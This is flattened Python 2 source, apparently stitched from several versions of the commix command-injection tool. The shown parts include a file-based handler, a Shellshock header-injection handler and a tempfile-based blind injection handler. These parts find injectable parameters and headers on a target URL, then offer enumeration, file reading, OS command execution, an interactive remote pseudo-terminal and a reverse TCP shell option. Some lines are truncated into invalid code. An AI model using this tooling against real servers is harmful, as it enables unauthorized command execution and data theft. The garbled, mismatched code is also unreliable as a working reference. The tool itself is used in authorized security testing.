after N failed tries. # Use the "/tmp/" directory for tempfile-based technique. elif i == settings.FAILED_TRIES and no_result == True : warn_msg = "It seems that you don't have permissions to " warn_msg += "read and/or write files in '" + settings.SRV_ROOT_DIR + "'." sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) print "" while True: question_msg = "Do you want to try the temporary directory (" + tmp_path + ") [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) tmp_upload = sys.stdin.readline().replace("\n","").lower() if tmp_upload in settings.CHOICE_YES: exit_loops = True settings.TEMPFILE_BASED_STATE = True call_tfb = tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response) if call_tfb != False: return True else: if no_result == True: return False else: return True elif tmp_upload in settings.CHOICE_NO: break elif tmp_upload in settings.CHOICE_QUIT: print "" raise else: if tmp_upload == "": tmp_upload = "enter" err_msg = "'" + tmp_upload + "' is not a valid answer." print settings.print_error_msg(err_msg) pass continue else: if exit_loops == False: if not settings.VERBOSITY_LEVEL >= 1: if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent)+ "%" else: percent = str(float_percent)+ "%" info_msg = "Testing the " + technique + "... [ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue else: continue else: raise elif e.getcode() == 401: err_msg = "Authorization required!" print settings.print_critical_msg(err_msg) + "\n" sys.exit(0) elif e.getcode() == 403: err_msg = "You don't have permission to access this page." print settings.print_critical_msg(err_msg) + "\n" sys.exit(0) except KeyboardInterrupt: if settings.VERBOSITY_LEVEL >= 1: print "" # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: if 'vuln_parameter' in locals(): # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except urllib2.URLError, e: warn_msg = "It seems that you don't have permissions to " warn_msg += "read and/or write files in '" + settings.SRV_ROOT_DIR + "'." sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) print "" # Provide custom server's root directory. custom_srv_root_dir() continue except: raise # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if not settings.VERBOSITY_LEVEL >= 1 and \ not menu.options.alter_shell and \ not next_attack_vector: next_attack_vector = True if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.VERBOSITY_LEVEL >= 1 and not settings.LOAD_SESSION: print "" # Print the findings to terminal. success_msg = "The" if found_vuln_parameter == " ": success_msg += http_request_method + "" success_msg += the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "." print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation(url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, delay=0, how_long=0, output_length=0, is_vulnerable="True") else: whitespace = settings.WHITESPACE[0] settings.LOAD_SESSION = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: question_msg = "Do you want to enumerate again? [Y/n/q] > " enumerate_again = raw_input("\n" + settings.print_question_msg(question_msg)).lower() if enumerate_again in settings.CHOICE_YES: fb_enumeration.do_check(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) print "" break elif enumerate_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.enumeration_options(): fb_enumeration.do_check(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if not menu.file_access_options() and not menu.options.os_cmd: if not settings.VERBOSITY_LEVEL >= 1: print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : if settings.ENUMERATION_DONE != True: print "" while True: question_msg = "Do you want to access files again? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline().replace("\n","").lower() if file_access_again in settings.CHOICE_YES: fb_file_access.do_check(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) print "" break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if file_access_again == "": file_access_again = "enter" err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.file_access_options(): if not menu.enumeration_options(): print "" fb_file_access.do_check(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) #print "" # Check if defined single cmd. if menu.options.os_cmd: # if not menu.file_access_options(): # print "" fb_enumeration.single_os_cmd_exec(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) try: # Pseudo-Terminal shell go_back = False go_back_again = False while True: # Delete previous shell (text) files (output) if settings.VERBOSITY_LEVEL >= 1: print "" delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if settings.VERBOSITY_LEVEL >= 1: print "\n" if go_back == True: break question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace("\n","").lower() if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) # if settings.VERBOSITY_LEVEL >= 1: # print "" if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) if os_shell_option == False: return False elif os_shell_option == "quit": # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": warn_msg = "You are already into an 'os_shell' mode." print settings.print_warning_msg(warn_msg)+ "\n" elif os_shell_option == "reverse_tcp": settings.REVERSE_TCP = True # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp() if settings.REVERSE_TCP == False: continue while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options() result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # Command execution results. shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay) if settings.VERBOSITY_LEVEL >= 1: print "" err_msg = "The reverse TCP connection has been failed!" print settings.print_critical_msg(err_msg) else: pass else: response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Command execution results. shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay) shell = "".join(str(p) for p in shell) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, shell, vuln_parameter) else: shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter) if shell: if shell != "": if settings.VERBOSITY_LEVEL >= 1: print "" print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" if not shell or shell == "": if settings.VERBOSITY_LEVEL >= 1: print "" err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg(err_msg) + "\n" elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if gotshell == "": gotshell = "enter" err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass except KeyboardInterrupt: if settings.VERBOSITY_LEVEL >= 1: print "" # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + "... " if settings.VERBOSITY_LEVEL > 1: info_msg = info_msg + "\n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: sys.stdout.write("\n" + settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) print settings.print_payload(payload) header = {check_header : payload} request = urllib2.Request(url, None, header) if check_header == "User-Agent": menu.options.agent = payload else: menu.options.agent = default_user_agent log_http_headers.do_check(request) log_http_headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor. elif menu.options.tor: response = tor.use_tor(request) else: response = urllib2.urlopen(request) percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len( > 0 and cve in percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len( > 0 and cve in percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False else: percent = str(float_percent )+ "%" if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if no_result == False: # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) vuln_parameter = "HTTP Header" the_type = " " + vuln_parameter check_header = " " + check_header vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload) check_header = check_header[1:] logs.update_payload(filename, counter, payload) if settings.VERBOSITY_LEVEL >= 1: checks.total_of_requests() success_msg = "The (" + check_header + ") '" success_msg += url + Style.RESET_ALL + Style.BRIGHT success_msg += "' seems vulnerable via " + technique + "." if settings.VERBOSITY_LEVEL <= 1: print "" print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL # Enumeration options. if settings.ENUMERATION_DONE == True : if settings.VERBOSITY_LEVEL >= 1: print "" while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) enumerate_again = sys.stdin.readline().replace("\n","").lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline().replace("\n","").lower() else: file_access_again= "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL raise SystemExit() else: # Pseudo-Terminal shell print "" go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace("\n","").lower() else: gotshell= "" if len(gotshell) == 0: gotshell= "y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again) if go_back: break else: shell, payload = cmd_exec(url, cmd, cve, check_header, filename) if shell != "": # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, shell) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: info_msg = "Executing the '" + cmd + "' command... " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") elif settings.VERBOSITY_LEVEL > 1: sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg(err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print settings.print_error_msg(err_msg) raise except: info_msg = "Testing the " + technique + "... " if settings.VERBOSITY_LEVEL > 1: info_msg = info_msg + "\n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() break elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) continue break else: continue if no_result and settings.VERBOSITY_LEVEL < 2: print "" except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response): # percent = "0.2" counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False is_vulnerable = False how_long_statistic = 0 export_injection_info = False how_long = 0 injection_type = "Semiblind Command Injection" technique = "tempfile-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Back.RED + "(x) Error: The '--url-reload' option is not available in " + technique + "!" + Style.RESET_ALL # percent = str(percent)+ "%" # sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") # sys.stdout.flush() # Calculate all possible combinations total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive resutls. TAG = "".join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) # The output file for file-based injection technique. OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" alter_shell = menu.options.alter_shell tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: # Tempfile-based decision payload (check if host is vulnerable). if alter_shell: payload = tfb_payloads.decision_alter_shell( separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method ) else: payload = tfb_payloads.decision( separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method ) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Encode payload to Base64 if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write( "\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL ) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url) # Injection percentage calculation percent = (num_of_chars * 100) / total float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (total * 1.0)), 2)) # Statistical analysis in time responses. how_long_statistic = how_long_statistic + how_long # Reset the how_long_statistic counter if output_length == tag_length - 1: how_long_statistic = 0 if percent == 100 and no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if ( (url_time_response == 0 and (how_long - delay) >= 0) or (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) ): # Time relative false positive fixation. false_positive_fixation = False if settings.TARGET_OS == "win": if len(TAG) == output_length and how_long > (how_long_statistic / output_length): false_positive_fixation = True else: if ( len(TAG) == output_length and delay == 1 and (how_long_statistic == delay) or delay > 1 and (how_long_statistic == (output_length + delay)) and how_long == delay + 1 ): false_positive_fixation = True # Check if false positive fixation is True. if false_positive_fixation: false_positive_fixation = False settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - delay randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 if settings.TARGET_OS == "win": if alter_shell: cmd = ( settings.WIN_PYTHON_DIR + 'python.exe -c "print (' + str(randv1) + " + " + str(randv2) + ')"' ) else: cmd = ( "powershell.exe -InputFormat none write (" + str(randv1) + " + " + str(randv2) + ")" ) else: cmd = "echo $((" + str(randv1) + " + " + str(randv2) + "))" # Check for false positive resutls how_long, output = tfb_injector.false_positive_check( separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, how_long, url_time_response, ) if ( (url_time_response == 0 and (how_long - delay) >= 0) or (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or ( url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1) ) ): if str(output) == str(randvcalc) and len(TAG) == output_length: is_vulnerable = True how_long_statistic = 0 if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break # False positive else: if not menu.options.verbose: percent = str(float_percent) + "%" sys.stdout.write( "\r(*) Testing the " + technique + "... " + "[ " + percent + " ]" ) sys.stdout.flush() continue else: if not menu.options.verbose: percent = str(float_percent) + "%" sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() continue if not menu.options.verbose: sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) raise except: percent = (num_of_chars * 100) / total float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (total * 1.0)), 2)) if str(float_percent) == "100.0": if no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() else: percent = "" break else: percent = str(float_percent) + "%" # Print logs notification message percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() print "" logs.logs_notification(filename) raise else: percent = str(float_percent) + "%" break # Yaw, got shellz! # Do some magic tricks! if ( (url_time_response == 0 and (how_long - delay) >= 0) or (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) ): if (len(TAG) == output_length) and (is_vulnerable == True): found = True no_result = False is_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = ( " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" ) # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique ) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, http_request_method, vuln_parameter, payload ) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub( "%20", " ", payload.replace("\n", "\\n") ) + Style.RESET_ALL if settings.TARGET_OS == "win": delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) time.sleep(1) # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: enumerate_again = raw_input( "\n(?) Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOISE_YES: tfb_enumeration.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, ) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: tfb_enumeration.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, ) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( "(?) Do you want to access files again? [Y/n] > " ).lower() if file_access_again in settings.CHOISE_YES: tfb_file_access.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, ) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: tfb_file_access.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, ) # Check if defined single cmd. if menu.options.os_cmd: check_how_long, output = tfb_enumeration.single_os_cmd_exec( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, ) # Export injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) sys.exit(0) try: # Pseudo-Terminal shell go_back = False go_back_again = False while True: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) if menu.options.verbose: print "" if go_back == True: break gotshell = raw_input("(?) Do you want a Pseudo-Terminal? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr( readline, "__doc__", "" ) is not None and "libedit" in getattr(readline, "__doc__", ""): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input( """commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """ ) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result ) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, 